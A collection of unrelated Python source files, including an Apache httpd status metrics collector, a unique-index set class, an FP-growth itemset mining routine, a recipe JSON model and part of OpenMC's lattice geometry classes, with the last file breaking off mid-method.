        super(HttpdCollector, self).__init__(*args, **kwargs)
        # Legacy single-'url' config is folded into the 'urls' list.
        if 'url' in self.config:
            self.config['urls'].append(self.config['url'])

        self.urls = {}
        for url in self.config['urls']:
            # Each entry is either "nickname url" or a bare url
            # (stored under the empty nickname).
            if ' ' in url:
                parts = url.split(' ')
                self.urls[parts[0]] = parts[1]
            else:
                self.urls[''] = url

    def get_default_config_help(self):
        config_help = super(HttpdCollector, self).get_default_config_help()
        config_help.update({
            'urls': "Urls to server-status in auto format, comma seperated,"
                    + " Format 'nickname http://host:port/server-status?auto, "
                    + ", nickname http://host:port/server-status?auto, etc'",
        })
        return config_help

    def get_default_config(self):
        """
        Returns the default collector settings
        """
        config = super(HttpdCollector, self).get_default_config()
        config.update({
            'path':     'httpd',
            'urls':     ['localhost http://localhost:8080/server-status?auto']
        })
        return config

    def collect(self):
        """Fetch each configured status URL and publish the known metrics."""
        for nickname in self.urls.keys():
            url = self.urls[nickname]

            # Metric keys of interest in the mod_status ?auto output.
            metrics = ['ReqPerSec', 'BytesPerSec', 'BytesPerReq',
                       'BusyWorkers', 'IdleWorkers', 'Total Accesses']
            try:
                # Follow Location redirects manually until the response
                # has no new location.
                while True:
                    # Parse Url
                    parts = urlparse.urlparse(url)

                    # Parse host and port
                    endpoint = parts[1].split(':')
                    if len(endpoint) > 1:
                        service_host = endpoint[0]
                        service_port = int(endpoint[1])
                    else:
                        service_host = endpoint[0]
                        service_port = 80

                    # Setup Connection
                    connection = httplib.HTTPConnection(service_host,
                                                        service_port)

                    # NOTE(review): rebuilt from path + query only; any
                    # params/fragment in the original URL are dropped.
                    url = "%s?%s" % (parts[2], parts[4])
                    connection.request("GET", url)
                    response = connection.getresponse()
                    data = response.read()
                    headers = dict(response.getheaders())
                    if ('location' not in headers
                            or headers['location'] == url):
                        connection.close()
                        break
                    url = headers['location']
                    connection.close()
            except Exception, e:
                self.log.error(
                    "Error retrieving HTTPD stats for host %s:%s, url '%s': %s",
                    service_host, str(service_port), url, e)
                continue

            # Each status line looks like "Key: value".
            exp = re.compile('^([A-Za-z ]+):\s+(.+)$')
            for line in data.split('\n'):
                if line:
                    m = exp.match(line)
                    if m:
                        k = m.group(1)
                        v = m.group(2)

                        if k in metrics:
                            # Get Metric Name (spaces removed, e.g.
                            # "Total Accesses" -> "TotalAccesses")
                            metric_name = "%s" % re.sub('\s+', '', k)

                            # Prefix with the nickname?
                            if len(nickname) > 0:
                                metric_name = nickname + '.' + metric_name

                            # Get Metric Value
                            metric_value = "%d" % float(v)

                            # Publish Metric
                            self.publish(metric_name, metric_value)
|
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Contact: Kyle Lahnakoski (kyle@lahnakoski.com)
#
from __future__ import absolute_import, division, unicode_literals
from mo_dots import is_data, is_sequence, tuplewrap, unwrap, wrap
from mo_dots.objects import datawrap
from mo_future import PY2, iteritems, Set, Mapping, Iterable
from mo_logs import Log
from mo_logs.exceptions import suppress_exception
DEBUG = False
class UniqueIndex(Set, Mapping):
    """
    DEFINE A SET OF ATTRIBUTES THAT UNIQUELY IDENTIFIES EACH OBJECT IN A list.
    THIS ALLOWS set-LIKE COMPARISIONS (UNION, INTERSECTION, DIFFERENCE, ETC) WHILE
    STILL MAINTAINING list-LIKE FEATURES
    KEYS CAN BE DOT-DELIMITED PATHS TO DEEP INNER OBJECTS
    """

    def __init__(self, keys, data=None, fail_on_dup=True):
        # key (as produced by value2key) -> raw, unwrapped object
        self._data = {}
        # property names (dot-delimited paths allowed) that form the key
        self._keys = tuplewrap(keys)
        self.count = 0
        # when True, adding a second, different object under an existing
        # key is a fatal error; otherwise the first object wins
        self.fail_on_dup = fail_on_dup
        if data:
            for d in data:
                self.add(d)

    def __getitem__(self, key):
        try:
            _key = value2key(self._keys, key)
            if len(self._keys) == 1 or len(_key) == len(self._keys):
                # full key given: direct dict lookup
                d = self._data.get(_key)
                return wrap(d)
            else:
                # partial key: linear scan for all records matching the
                # given key columns
                output = wrap([
                    d
                    for d in self._data.values()
                    if all(wrap(d)[k] == v for k, v in _key.items())
                ])
                return output
        except Exception as e:
            Log.error("something went wrong", e)

    def __setitem__(self, key, value):
        # direct assignment is not supported; use add()
        Log.error("Use add() to add to an index")

    def keys(self):
        return self._data.keys()

    def pop(self):
        """Remove and return an arbitrary member (wrapped)."""
        # next(...) works on both Python 2 and 3; the iterator's .next()
        # method (used previously) does not exist on Python 3
        output = next(iter(iteritems(self._data)))[1]
        self.remove(output)
        return wrap(output)

    def add(self, val):
        val = datawrap(val)
        key = value2key(self._keys, val)
        if key == None:
            Log.error("Expecting key to be not None")
        try:
            d = self._data.get(key)
        except Exception:
            # the key may not be usable as a dict key on the first attempt;
            # rebuild it and retry the lookup so `d` is always bound below
            # (previously `d` was left undefined here, raising NameError)
            key = value2key(self._keys, val)
            d = self._data.get(key)
        if d is None:
            self._data[key] = unwrap(val)
            self.count += 1
        elif d is not val:
            if self.fail_on_dup:
                Log.error("{{new|json}} with key {{key|json}} already filled with {{old|json}}", key=key, new=val, old=self[val])
            elif DEBUG:
                Log.warning("key {{key|json}} already filled\nExisting\n{{existing|json|indent}}\nValue\n{{value|json|indent}}",
                    key=key,
                    existing=d,
                    value=val
                )

    def extend(self, values):
        for v in values:
            self.add(v)

    def remove(self, val):
        key = value2key(self._keys, datawrap(val))
        if key == None:
            Log.error("Expecting key to not be None")
        d = self._data.get(key)
        if d is None:
            # ALREADY GONE
            return
        else:
            del self._data[key]
            self.count -= 1

    def __contains__(self, key):
        return self[key] != None

    if PY2:
        def __iter__(self):
            return (wrap(v) for v in self._data.itervalues())
    else:
        def __iter__(self):
            return (wrap(v) for v in self._data.values())

    def __sub__(self, other):
        output = UniqueIndex(self._keys, fail_on_dup=self.fail_on_dup)
        for v in self:
            if v not in other:
                output.add(v)
        return output

    def __and__(self, other):
        output = UniqueIndex(self._keys)
        for v in self:
            if v in other:
                output.add(v)
        return output

    def __or__(self, other):
        output = UniqueIndex(self._keys)
        for v in self:
            output.add(v)
        for v in other:
            # duplicates coming from `other` are ignored (left side wins)
            with suppress_exception:
                output.add(v)
        return output

    def __ior__(self, other):
        for v in other:
            with suppress_exception:
                self.add(v)
        return self

    def __xor__(self, other):
        if not isinstance(other, Iterable):
            Log.error("Expecting other to be iterable")
        other = UniqueIndex(keys=self._keys, data=other, fail_on_dup=False)
        return (self - other) | (other - self)

    def __len__(self):
        if self.count == 0:
            # count was never established; recount by iterating
            for d in self:
                self.count += 1
        return self.count

    def subtract(self, other):
        return self.__sub__(other)

    def intersect(self, other):
        return self.__and__(other)
def value2key(keys, val):
    """Build the index key for `val` under the given key columns."""
    if len(keys) == 1:
        # single-column index: the key is the bare value
        if is_data(val):
            return val[keys[0]]
        if is_sequence(val):
            return val[0]
        return val
    # multi-column index: the key is a (wrapped) column -> value mapping
    if is_data(val):
        return datawrap({k: val[k] for k in keys})
    if is_sequence(val):
        return datawrap(dict(zip(keys, val)))
    Log.error("do not know what to do here")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Created on Sep 20, 2015
@author: freestyle4568
'''
"""
this progarm is to test fp-growth algorithm
user guide: result_list, support_data_dict = fptree(dataset, min_support)
该函数返回列表格式的result_list, 元素为列表, [[1元素项集], [2元素项集]]
子列表元素为固定集合 -- frozenset({, , ,})
support_data_dict为字典格式,元素为(frozenset({}): number)
"""
from operator import itemgetter
class TreeNode:
    """One node of an FP-tree: an item name, its count, and tree links."""

    def __init__(self, name_value, num_occur, parent_node):
        self.name = name_value        # item this node represents
        self.count = num_occur        # occurrences along this path
        self.nodelink = None          # next node carrying the same item
        self.parent = parent_node     # parent node (None for the root)
        self.children = {}            # item name -> child TreeNode

    def inc(self, num_occur):
        """Add num_occur to this node's count."""
        self.count += num_occur

    def disp(self, index=1):
        """Print the subtree rooted at this node, indented by depth."""
        print(' '*index, self.name, ' ', self.count)
        for child in self.children.values():
            child.disp(index + 1)
        return
def create_tree(dataset, min_support=1):
    """Build an FP-tree from a {frozenset(transaction): count} dict.

    Returns (root, header_table), or (None, None) when no item reaches
    min_support.  header_table maps item -> [support, first node link].
    """
    # First pass: accumulate the total support of every item.
    support = {}
    for transaction in dataset:
        for item in transaction:
            support[item] = support.get(item, 0) + dataset[transaction]
    # Discard the infrequent items.
    for item in list(support):
        if support[item] < min_support:
            del support[item]
    frequent_items = set(support)
    if not frequent_items:
        # nothing satisfies min_support
        return None, None
    # header table: item -> [support, head of the node-link chain]
    header_table = {item: [count, None] for item, count in support.items()}
    root = TreeNode('NullNode', 1, None)
    # Second pass: insert each transaction's frequent items, ordered by
    # (support, item) descending so shared prefixes overlap in the tree.
    for transaction, count in dataset.items():
        local_data = {item: header_table[item][0]
                      for item in transaction if item in frequent_items}
        if len(local_data) > 0:
            ordered_items = [pair[0] for pair in sorted(local_data.items(),
                             key=itemgetter(1, 0), reverse=True)]
            update_tree(ordered_items, root, header_table, count)
    return root, header_table
def update_tree(items, tree, header_table, count):
    """Insert the ordered item list into the tree, adding `count` along it."""
    first = items[0]
    child = tree.children.get(first)
    if child is not None:
        # the path already exists: just bump its count
        child.inc(count)
    else:
        # grow a new branch and thread it onto this item's node-link chain
        child = TreeNode(first, count, tree)
        tree.children[first] = child
        if header_table[first][1] is None:
            header_table[first][1] = child
        else:
            update_header(header_table[first][1], child)
    if len(items) > 1:
        # recurse with the remaining suffix
        update_tree(items[1:], child, header_table, count)
    return
def update_header(node_to_test, target_node):
    """Append target_node to the end of the node-link chain starting at
    node_to_test."""
    tail = node_to_test
    while tail.nodelink is not None:
        tail = tail.nodelink
    tail.nodelink = target_node
    return
def load_simple_data():
    """Return the small hard-coded transaction dataset used for testing."""
    return [
        ['r', 'z', 'h', 'j', 'p'],
        ['z', 'y', 'x', 'w', 'v', 'u', 't', 's'],
        ['z'],
        ['r', 'x', 'n', 'o', 's'],
        ['y', 'r', 'x', 'z', 'q', 't', 'p'],
        ['y', 'z', 'x', 'e', 'q', 's', 't', 'm'],
    ]
def create_init_set(dataset):
    """Convert a list of transactions into a {frozenset: count} dict.

    Duplicate transactions are counted, not collapsed: the previous
    unconditional `= 1` assignment silently dropped repeats, deflating
    every support computed from the tree.
    """
    result_dict = {}
    for transaction in dataset:
        key = frozenset(transaction)
        result_dict[key] = result_dict.get(key, 0) + 1
    return result_dict
def ascend_tree(leaf_node, prefix_path):
    """Append the names of leaf_node and its ancestors (root excluded,
    leaf first) to prefix_path."""
    node = leaf_node
    while node.parent is not None:
        prefix_path.append(node.name)
        node = node.parent
    return
def find_prefix_path(tree_node):
    """Walk the node-link chain from tree_node and return the conditional
    pattern base as a {prefix path: count} dict."""
    condition_path = {}
    node = tree_node
    while node is not None:
        path = []
        ascend_tree(node, path)
        # path[0] is the node itself; the remainder is its prefix path
        if len(path) > 1:
            condition_path[frozenset(path[1:])] = node.count
        node = node.nodelink
    return condition_path
def mine_tree(tree, header_table, min_support, prefix, freqitem_list, support_list):
    """Recursively mine frequent itemsets from the FP-tree.

    Every discovered itemset is appended to freqitem_list with its
    support appended to support_list (parallel lists).
    """
    # visit items from lowest support upward
    bases = [pair[0] for pair in sorted(header_table.items(),
                                        key=lambda p: p[1][0])]
    for base in bases:
        new_freq_set = prefix | {base}
        freqitem_list.append(new_freq_set)
        support_list.append(header_table[base][0])
        # build this item's conditional pattern base and conditional tree
        condition_path = find_prefix_path(header_table[base][1])
        condition_tree, condition_header_table = create_tree(condition_path, min_support)
        if condition_header_table is not None:
            mine_tree(condition_tree, condition_header_table, min_support,
                      new_freq_set, freqitem_list, support_list)
def resultlist2dict(freqitem_list, support_list):
    """Group frequent itemsets by size and pair each with its support.

    Returns (result_list, support_data): result_list[k] holds the
    frozensets of size k+1, and support_data maps frozenset -> support.
    Note: freqitem_list is consumed (emptied) in the process.
    """
    support_data = {}
    max_size = 0
    for i in range(len(freqitem_list)):
        support_data[frozenset(freqitem_list[i])] = support_list[i]
        if len(freqitem_list[i]) > max_size:
            max_size = len(freqitem_list[i])
    result_list = []
    for size in range(1, max_size + 1):
        bucket = []
        # iterate over a snapshot so removal below is safe
        for itemset in freqitem_list.copy():
            if len(itemset) == size:
                bucket.append(frozenset(itemset))
                freqitem_list.remove(itemset)
        result_list.append(bucket)
    return result_list, support_data
def fptree(dataset, min_support):
    """Run FP-growth over a list of transactions.

    Returns (result_list, support_data) where supports have been
    converted to relative frequencies (count / number of transactions).
    """
    data_len = len(dataset)
    transaction_counts = create_init_set(dataset)
    tree, header_table = create_tree(transaction_counts, min_support)
    freqitem_list = []
    support_list = []
    mine_tree(tree, header_table, min_support, set(), freqitem_list, support_list)
    result_list, support_data = resultlist2dict(freqitem_list, support_list)
    # convert absolute counts to relative frequencies
    for itemset in support_data:
        support_data[itemset] = support_data[itemset] / data_len
    return result_list, support_data
if __name__ == '__main__':
    # Debug preview of a real dataset.  Read with a context manager so the
    # file handle is always closed (the original leaked it), and tolerate a
    # missing file: the hard-coded path only exists on the author's machine
    # and the demo below uses the bundled sample data anyway.
    filename = '/home/freestyle4568/lesson/Clothes-match-txt/user_catset.txt'
    dataset = []
    try:
        with open(filename) as fr:
            for line in fr:
                catset = line.split()[1]
                dataset.append(catset.split(','))
        for i in range(10):
            print(dataset[i])
    except IOError as e:
        print('could not read %s: %s' % (filename, e))
    # Mining demo on the small built-in dataset.
    dataset = load_simple_data()
    result_list, support_data = fptree(dataset, 3)
    for i in result_list:
        print(i)
    print(len(support_data))
    for j in support_data.items():
        print(j)
|
###############################################################################
#
# recipemodel.py
#
# Provides the class model for a recipe. The class model is passed around in
# the application proper.
#
###############################################################################
import simplejson as json
class RecipeModel():
    """Model object for a single recipe.

    Handles (de)serialization to the JSON-based .rcpe format and is
    passed around in the application proper.
    """

    def __init__(self):
        self.name = 'noname'        # recipe title
        self.course = 'none'        # course category
        self.servingSize = 0        # number of servings
        self.ingredients = []       # list of {'name','quantity','unit'} dicts
        self.instructions = []      # ordered list of instruction strings
        self.images = []            # list of image file paths

    def export_recipe(self):
        """
        This function exports the current recipe object as a JSON-encoded
        recipe (.rcpe) file.
        Actually just returns a JSON-encoded string
        """
        # Dump the object into a compact JSON-formatted string
        json_recipe = json.dumps({"name":self.name,"course":self.course,
            "serving_size":self.servingSize,"ingredients":self.ingredients,
            "instructions":self.instructions,"images":self.images},
            separators=(',',':'))
        return json_recipe

    def import_recipe(self, raw_json):
        """
        Parses a JSON-encoded .rcpe file and then sets it to itself.
        The string containing the [contents] of the JSON file is passed into
        this function.
        """
        raw_recipe = json.loads(raw_json)
        print(raw_recipe)  # debug output
        self.name = raw_recipe['name']
        self.course = raw_recipe['course']
        self.servingSize = raw_recipe['serving_size']
        self.ingredients = raw_recipe['ingredients']
        self.instructions = raw_recipe['instructions']
        self.images = raw_recipe['images']

    def print_recipe_information(self):
        """
        A useful debugging function that prints the entirety of the recipe
        """
        # Print basic information
        print('\nName: ' + self.name)
        print('Course: ' + self.course)
        print('Serving Size: ' + str(self.servingSize))
        # Print the ingredients
        print('\nIngredients:')
        if len(self.ingredients) == 0:
            print('No ingredients.')
        else:
            for ingredient in self.ingredients:
                print(ingredient['name'] + str(ingredient['quantity']) +
                      ingredient['unit'])
        # Print the instructions
        print('\nInstructions:')
        if len(self.instructions) == 0:
            print('No instructions.')
        else:
            for instruction in self.instructions:
                print(instruction)
        # Print the filepaths of the images
        print('\nImage paths:')
        if len(self.images) == 0:
            print('No images.')
        else:
            for filePath in self.images:
                print(filePath)

    def get_recipe(self, recipe):
        """
        Assigns a given recipe to this recipe.
        """
        self.name = recipe.name
        self.course = recipe.course
        self.servingSize = recipe.servingSize
        self.ingredients = recipe.ingredients
        self.instructions = recipe.instructions
        # BUG FIX: images was the only field not copied, leaving stale
        # images on the target recipe after assignment.
        self.images = recipe.images
|
from abc import ABCMeta
from collections import OrderedDict
from collections.abc import Iterable
from copy import deepcopy
from math import sqrt, floor
from numbers import Real, Integral
from xml.etree import ElementTree as ET
import numpy as np
import openmc.checkvalue as cv
import openmc
from openmc.mixin import IDManagerMixin
class Lattice(IDManagerMixin, metaclass=ABCMeta):
    """A repeating structure wherein each element is a universe.

    Parameters
    ----------
    lattice_id : int, optional
        Unique identifier for the lattice. If not specified, an identifier will
        automatically be assigned.
    name : str, optional
        Name of the lattice. If not specified, the name is the empty string.

    Attributes
    ----------
    id : int
        Unique identifier for the lattice
    name : str
        Name of the lattice
    pitch : Iterable of float
        Pitch of the lattice in each direction in cm
    outer : openmc.Universe
        A universe to fill all space outside the lattice
    universes : Iterable of Iterable of openmc.Universe
        A two- or three-dimensional list/array of universes filling each element
        of the lattice
    """

    next_id = 1
    # Lattices share the universe ID space (a lattice can fill a cell
    # anywhere a universe can), so reuse the Universe ID registry.
    used_ids = openmc.Universe.used_ids

    def __init__(self, lattice_id=None, name=''):
        # Initialize Lattice class attributes
        self.id = lattice_id
        self.name = name
        self._pitch = None
        self._outer = None
        self._universes = None

    @property
    def name(self):
        return self._name

    @property
    def pitch(self):
        return self._pitch

    @property
    def outer(self):
        return self._outer

    @property
    def universes(self):
        return self._universes

    @name.setter
    def name(self, name):
        # Accept None as "no name" and store the empty string instead
        if name is not None:
            cv.check_type('lattice name', name, str)
            self._name = name
        else:
            self._name = ''

    @outer.setter
    def outer(self, outer):
        cv.check_type('outer universe', outer, openmc.Universe)
        self._outer = outer

    @staticmethod
    def from_hdf5(group, universes):
        """Create lattice from HDF5 group

        Parameters
        ----------
        group : h5py.Group
            Group in HDF5 file
        universes : dict
            Dictionary mapping universe IDs to instances of
            :class:`openmc.Universe`.

        Returns
        -------
        openmc.Lattice
            Instance of lattice subclass

        """
        # The group name ends in 'lattice <id>'; strip the text to recover
        # the numeric ID.
        lattice_id = int(group.name.split('/')[-1].lstrip('lattice '))
        name = group['name'].value.decode() if 'name' in group else ''
        lattice_type = group['type'].value.decode()

        if lattice_type == 'rectangular':
            dimension = group['dimension'][...]
            lower_left = group['lower_left'][...]
            pitch = group['pitch'][...]
            outer = group['outer'].value
            universe_ids = group['universes'][...]

            # Create the Lattice
            lattice = openmc.RectLattice(lattice_id, name)
            lattice.lower_left = lower_left
            lattice.pitch = pitch

            # If the Universe specified outer the Lattice is not void
            # (a negative ID in the file means "no outer universe")
            if outer >= 0:
                lattice.outer = universes[outer]

            # Build array of Universe pointers for the Lattice
            uarray = np.empty(universe_ids.shape, dtype=openmc.Universe)
            for z in range(universe_ids.shape[0]):
                for y in range(universe_ids.shape[1]):
                    for x in range(universe_ids.shape[2]):
                        uarray[z, y, x] = universes[universe_ids[z, y, x]]

            # Use 2D NumPy array to store lattice universes for 2D lattices
            if len(dimension) == 2:
                uarray = np.squeeze(uarray)
                uarray = np.atleast_2d(uarray)

            # Set the universes for the lattice
            lattice.universes = uarray

        elif lattice_type == 'hexagonal':
            n_rings = group['n_rings'].value
            n_axial = group['n_axial'].value
            center = group['center'][...]
            pitch = group['pitch'][...]
            outer = group['outer'].value
            universe_ids = group['universes'][...]

            # Create the Lattice
            lattice = openmc.HexLattice(lattice_id, name)
            lattice.center = center
            lattice.pitch = pitch

            # If the Universe specified outer the Lattice is not void
            if outer >= 0:
                lattice.outer = universes[outer]

            # Build array of Universe pointers for the Lattice. Note that
            # we need to convert between the HDF5's square array of
            # (x, alpha, z) to the Python API's format of a ragged nested
            # list of (z, ring, theta).
            uarray = []
            for z in range(n_axial):
                # Add a list for this axial level.
                uarray.append([])
                # Start at the top-most element of the outermost ring and
                # walk the six sides of each hexagonal ring clockwise.
                x = n_rings - 1
                a = 2*n_rings - 2
                for r in range(n_rings - 1, 0, -1):
                    # Add a list for this ring.
                    uarray[-1].append([])

                    # Climb down the top-right.
                    for i in range(r):
                        uarray[-1][-1].append(universe_ids[z, a, x])
                        x += 1
                        a -= 1

                    # Climb down the right.
                    for i in range(r):
                        uarray[-1][-1].append(universe_ids[z, a, x])
                        a -= 1

                    # Climb down the bottom-right.
                    for i in range(r):
                        uarray[-1][-1].append(universe_ids[z, a, x])
                        x -= 1

                    # Climb up the bottom-left.
                    for i in range(r):
                        uarray[-1][-1].append(universe_ids[z, a, x])
                        x -= 1
                        a += 1

                    # Climb up the left.
                    for i in range(r):
                        uarray[-1][-1].append(universe_ids[z, a, x])
                        a += 1

                    # Climb up the top-left.
                    for i in range(r):
                        uarray[-1][-1].append(universe_ids[z, a, x])
                        x += 1

                    # Move down to the next ring.
                    a -= 1

                    # Convert the ids into Universe objects.
                    uarray[-1][-1] = [universes[u_id]
                                      for u_id in uarray[-1][-1]]

                # Handle the degenerate center ring separately.
                u_id = universe_ids[z, a, x]
                uarray[-1].append([universes[u_id]])

            # Add the universes to the lattice.
            if len(pitch) == 2:
                # Lattice is 3D
                lattice.universes = uarray
            else:
                # Lattice is 2D; extract the only axial level
                lattice.universes = uarray[0]

        return lattice

    def get_unique_universes(self):
        """Determine all unique universes in the lattice

        Returns
        -------
        universes : collections.OrderedDict
            Dictionary whose keys are universe IDs and values are
            :class:`openmc.Universe` instances

        """
        univs = OrderedDict()
        # Walk the (possibly ragged) 2- or 3-level nested structure; an
        # element is either a Universe (2 levels) or another list (3 levels).
        for k in range(len(self._universes)):
            for j in range(len(self._universes[k])):
                if isinstance(self._universes[k][j], openmc.Universe):
                    u = self._universes[k][j]
                    univs[u._id] = u
                else:
                    for i in range(len(self._universes[k][j])):
                        u = self._universes[k][j][i]
                        assert isinstance(u, openmc.Universe)
                        univs[u._id] = u

        # The outer universe (if any) also counts as part of the lattice
        if self.outer is not None:
            univs[self.outer._id] = self.outer

        return univs

    def get_nuclides(self):
        """Returns all nuclides in the lattice

        Returns
        -------
        nuclides : list of str
            List of nuclide names

        """
        nuclides = []

        # Get all unique Universes contained in each of the lattice cells
        unique_universes = self.get_unique_universes()

        # Append all Universes containing each cell to the dictionary
        for universe in unique_universes.values():
            for nuclide in universe.get_nuclides():
                if nuclide not in nuclides:
                    nuclides.append(nuclide)

        return nuclides

    def get_all_cells(self):
        """Return all cells that are contained within the lattice

        Returns
        -------
        cells : collections.OrderedDict
            Dictionary whose keys are cell IDs and values are :class:`Cell`
            instances

        """
        cells = OrderedDict()
        unique_universes = self.get_unique_universes()

        for universe_id, universe in unique_universes.items():
            cells.update(universe.get_all_cells())

        return cells

    def get_all_materials(self):
        """Return all materials that are contained within the lattice

        Returns
        -------
        materials : collections.OrderedDict
            Dictionary whose keys are material IDs and values are
            :class:`Material` instances

        """
        materials = OrderedDict()

        # Append all Cells in each Cell in the Universe to the dictionary
        cells = self.get_all_cells()
        for cell_id, cell in cells.items():
            materials.update(cell.get_all_materials())

        return materials

    def get_all_universes(self):
        """Return all universes that are contained within the lattice

        Returns
        -------
        universes : collections.OrderedDict
            Dictionary whose keys are universe IDs and values are
            :class:`Universe` instances

        """
        # Initialize a dictionary of all Universes contained by the Lattice
        # in each nested Universe level
        all_universes = OrderedDict()

        # Get all unique Universes contained in each of the lattice cells
        unique_universes = self.get_unique_universes()

        # Add the unique Universes filling each Lattice cell
        all_universes.update(unique_universes)

        # Append all Universes containing each cell to the dictionary
        for universe_id, universe in unique_universes.items():
            all_universes.update(universe.get_all_universes())

        return all_universes

    def get_universe(self, idx):
        r"""Return universe corresponding to a lattice element index

        Parameters
        ----------
        idx : Iterable of int
            Lattice element indices. For a rectangular lattice, the indices are
            given in the :math:`(x,y)` or :math:`(x,y,z)` coordinate system. For
            hexagonal lattices, they are given in the :math:`x,\alpha` or
            :math:`x,\alpha,z` coordinate systems.

        Returns
        -------
        openmc.Universe
            Universe with given indices

        """
        # Translate natural indices into array indices before lookup
        idx_u = self.get_universe_index(idx)
        if self.ndim == 2:
            return self.universes[idx_u[0]][idx_u[1]]
        else:
            return self.universes[idx_u[0]][idx_u[1]][idx_u[2]]

    def find(self, point):
        """Find cells/universes/lattices which contain a given point

        Parameters
        ----------
        point : 3-tuple of float
            Cartesian coordinates of the point

        Returns
        -------
        list
            Sequence of universes, cells, and lattices which are traversed to
            find the given point

        """
        idx, p = self.find_element(point)
        if self.is_valid_index(idx):
            u = self.get_universe(idx)
        else:
            # Point falls outside the lattice: defer to the outer universe,
            # or report "not found" when there is none
            if self.outer is not None:
                u = self.outer
            else:
                return []
        return [(self, idx)] + u.find(p)

    def clone(self, memo=None):
        """Create a copy of this lattice with a new unique ID, and clones
        all universes within this lattice.

        Parameters
        ----------
        memo : dict or None
            A nested dictionary of previously cloned objects. This parameter
            is used internally and should not be specified by the user.

        Returns
        -------
        clone : openmc.Lattice
            The clone of this lattice

        """
        if memo is None:
            memo = {}

        # If no memoized clone exists, instantiate one
        if self not in memo:
            clone = deepcopy(self)
            # Setting id to None triggers automatic assignment of a new ID
            clone.id = None

            if self.outer is not None:
                clone.outer = self.outer.clone(memo)

            # Assign universe clones to the lattice clone
            for i in self.indices:
                if isinstance(self, RectLattice):
                    clone.universes[i] = self.universes[i].clone(memo)
                else:
                    # Hex lattices store universes in ragged nested lists
                    if self.ndim == 2:
                        clone.universes[i[0]][i[1]] = \
                            self.universes[i[0]][i[1]].clone(memo)
                    else:
                        clone.universes[i[0]][i[1]][i[2]] = \
                            self.universes[i[0]][i[1]][i[2]].clone(memo)

            # Memoize the clone
            memo[self] = clone

        return memo[self]
class RectLattice(Lattice):
    """A lattice consisting of rectangular prisms.

    To completely define a rectangular lattice, the
    :attr:`RectLattice.lower_left` :attr:`RectLattice.pitch`,
    :attr:`RectLattice.outer`, and :attr:`RectLattice.universes` properties need
    to be set.

    Most methods for this class use a natural indexing scheme wherein elements
    are assigned an index corresponding to their position relative to the
    (x,y,z) axes in a Cartesian coordinate system, i.e., an index of (0,0,0) in
    the lattice gives the element whose x, y, and z coordinates are the
    smallest. However, note that when universes are assigned to lattice elements
    using the :attr:`RectLattice.universes` property, the array indices do not
    correspond to natural indices.

    Parameters
    ----------
    lattice_id : int, optional
        Unique identifier for the lattice. If not specified, an identifier will
        automatically be assigned.
    name : str, optional
        Name of the lattice. If not specified, the name is the empty string.

    Attributes
    ----------
    id : int
        Unique identifier for the lattice
    name : str
        Name of the lattice
    pitch : Iterable of float
        Pitch of the lattice in the x, y, and (if applicable) z directions in
        cm.
    outer : openmc.Universe
        A universe to fill all space outside the lattice
    universes : Iterable of Iterable of openmc.Universe
        A two- or three-dimensional list/array of universes filling each element
        of the lattice. The first dimension corresponds to the z-direction (if
        applicable), the second dimension corresponds to the y-direction, and
        the third dimension corresponds to the x-direction. Note that for the
        y-direction, a higher index corresponds to a lower physical
        y-value. Each z-slice in the array can be thought of as a top-down view
        of the lattice.
    lower_left : Iterable of float
        The Cartesian coordinates of the lower-left corner of the lattice. If
        the lattice is two-dimensional, only the x- and y-coordinates are
        specified.
    indices : list of tuple
        A list of all possible (z,y,x) or (y,x) lattice element indices. These
        indices correspond to indices in the :attr:`RectLattice.universes`
        property.
    ndim : int
        The number of dimensions of the lattice
    shape : Iterable of int
        An array of two or three integers representing the number of lattice
        cells in the x- and y- (and z-) directions, respectively.

    """

    def __init__(self, lattice_id=None, name=''):
        super().__init__(lattice_id, name)

        # Initialize Lattice class attributes
        self._lower_left = None

    def __repr__(self):
        string = 'RectLattice\n'
        string += '{0: <16}{1}{2}\n'.format('\tID', '=\t', self._id)
        string += '{0: <16}{1}{2}\n'.format('\tName', '=\t', self._name)
        string += '{0: <16}{1}{2}\n'.format('\tShape', '=\t',
                                            self.shape)
        string += '{0: <16}{1}{2}\n'.format('\tLower Left', '=\t',
                                            self._lower_left)
        string += '{0: <16}{1}{2}\n'.format('\tPitch', '=\t', self._pitch)
        if self._outer is not None:
            string += '{0: <16}{1}{2}\n'.format('\tOuter', '=\t',
                                                self._outer._id)
        else:
            string += '{0: <16}{1}{2}\n'.format('\tOuter', '=\t',
                                                self._outer)

        string += '{0: <16}\n'.format('\tUniverses')

        # Lattice nested Universe IDs - column major for Fortran
        for i, universe in enumerate(np.ravel(self._universes)):
            string += '{0} '.format(universe._id)

            # Add a newline character every time we reach end of row of cells
            if (i+1) % self.shape[0] == 0:
                string += '\n'

        string = string.rstrip('\n')

        return string

    @property
    def indices(self):
        # Array-order (y,x) or (z,y,x) index tuples covering every element;
        # note shape is (nx,ny[,nz]), hence the reversed slice order.
        if self.ndim == 2:
            return list(np.broadcast(*np.ogrid[
                :self.shape[1], :self.shape[0]]))
        else:
            return list(np.broadcast(*np.ogrid[
                :self.shape[2], :self.shape[1], :self.shape[0]]))

    @property
    def _natural_indices(self):
        """Iterate over all possible (x,y) or (x,y,z) lattice element indices.

        This property is used when constructing distributed cell and material
        paths. Most importantly, the iteration order matches that used on the
        Fortran side.

        """
        if self.ndim == 2:
            nx, ny = self.shape
            return np.broadcast(*np.ogrid[:nx, :ny])
        else:
            nx, ny, nz = self.shape
            return np.broadcast(*np.ogrid[:nx, :ny, :nz])

    @property
    def lower_left(self):
        return self._lower_left

    @property
    def ndim(self):
        # Dimensionality is inferred from the pitch (2 or 3 entries)
        if self.pitch is not None:
            return len(self.pitch)
        else:
            raise ValueError('Number of dimensions cannot be determined until '
                             'the lattice pitch has been set.')

    @property
    def shape(self):
        # The universes array is stored (z,y,x)/(y,x); reverse to (x,y[,z])
        return self._universes.shape[::-1]

    @lower_left.setter
    def lower_left(self, lower_left):
        cv.check_type('lattice lower left corner', lower_left, Iterable, Real)
        cv.check_length('lattice lower left corner', lower_left, 2, 3)
        self._lower_left = lower_left

    @Lattice.pitch.setter
    def pitch(self, pitch):
        cv.check_type('lattice pitch', pitch, Iterable, Real)
        cv.check_length('lattice pitch', pitch, 2, 3)
        for dim in pitch:
            cv.check_greater_than('lattice pitch', dim, 0.0)
        self._pitch = pitch

    @Lattice.universes.setter
    def universes(self, universes):
